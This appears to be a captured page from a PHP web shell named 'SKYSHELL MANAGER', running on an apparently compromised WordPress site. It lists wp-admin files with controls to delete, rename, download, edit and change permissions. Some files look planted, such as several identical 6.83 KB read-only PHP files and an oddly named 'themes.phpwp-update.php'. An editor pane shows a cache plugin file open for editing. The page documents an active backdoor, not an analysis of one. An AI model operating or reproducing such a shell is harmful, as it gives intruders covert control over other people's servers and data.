📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: wp-cache-phase1.php
<?php require_once dirname( __FILE__ ) . '/wp-cache-phase2.php'; // error_reporting(E_ERROR | E_PARSE); // uncomment to debug this file! if ( ! @include WP_CONTENT_DIR . '/wp-cache-config.php' ) { return false; } if ( ! defined( 'WPCACHEHOME' ) ) { define( 'WPCACHEHOME', dirname( __FILE__ ) . '/' ); } if ( defined( 'DISABLE_SUPERCACHE' ) ) { wp_cache_debug( 'DISABLE_SUPERCACHE set, super_cache disabled.' ); $super_cache_enabled = 0; } require WPCACHEHOME . 'wp-cache-base.php'; if ( $blogcacheid != '' ) { $blog_cache_dir = str_replace( '//', '/', $cache_path . 'blogs/' . $blogcacheid . '/' ); } else { $blog_cache_dir = $cache_path; } $wp_cache_phase1_loaded = true; $mutex_filename = 'wp_cache_mutex.lock'; $new_cache = false; if ( ! isset( $wp_cache_plugins_dir ) ) { $wp_cache_plugins_dir = WPCACHEHOME . 'plugins'; } if ( isset( $_GET['donotcachepage'] ) && isset( $cache_page_secret ) && $_GET['donotcachepage'] == $cache_page_secret ) { $cache_enabled = false; define( 'DONOTCACHEPAGE', 1 ); } $plugins = glob( $wp_cache_plugins_dir . '/*.php' ); if ( is_array( $plugins ) ) { foreach ( $plugins as $plugin ) { if ( is_file( $plugin ) ) { require_once $plugin; } } } $wp_start_time = microtime(); if ( $wp_cache_not_logged_in && wp_cache_get_cookies_values() ) { wp_cache_debug( 'Caching disabled for logged in users on settings page.' ); return true; } if ( isset( $wp_cache_make_known_anon ) && $wp_cache_make_known_anon ) { wp_supercache_cache_for_admins(); } do_cacheaction( 'cache_init' ); if ( ! $cache_enabled || ( isset( $_SERVER['REQUEST_METHOD'] ) && in_array( $_SERVER['REQUEST_METHOD'], array( 'POST', 'PUT', 'DELETE' ) ) ) || isset( $_GET['customize_changeset_uuid'] ) ) { return true; } $file_expired = false; $cache_filename = ''; $meta_file = ''; $wp_cache_gzip_encoding = ''; $gzipped = 0; $gzsize = 0; if ( $cache_compression ) { $wp_cache_gzip_encoding = gzip_accepted(); } add_cacheaction( 'supercache_filename_str', 'wp_cache_check_mobile' ); if ( function_exists( 'add_filter' ) ) { // loaded since WordPress 4.6 add_filter( 'supercache_filename_str', 'wp_cache_check_mobile' ); } $wp_cache_request_uri = $_SERVER['REQUEST_URI']; // Cache this in case any plugin modifies it. if ( $wp_cache_object_cache ) { if ( ! include_once WP_CONTENT_DIR . '/object-cache.php' ) { return; } wp_cache_init(); // Note: wp-settings.php calls wp_cache_init() which clobbers the object made here. if ( ! is_object( $wp_object_cache ) ) { return; } } if ( defined( 'DOING_CRON' ) ) { extract( wp_super_cache_init() ); // $key, $cache_filename, $meta_file, $cache_file, $meta_pathname return true; } if ( ! isset( $wp_super_cache_late_init ) || ( isset( $wp_super_cache_late_init ) && false == $wp_super_cache_late_init ) ) { wp_cache_serve_cache_file(); }
Save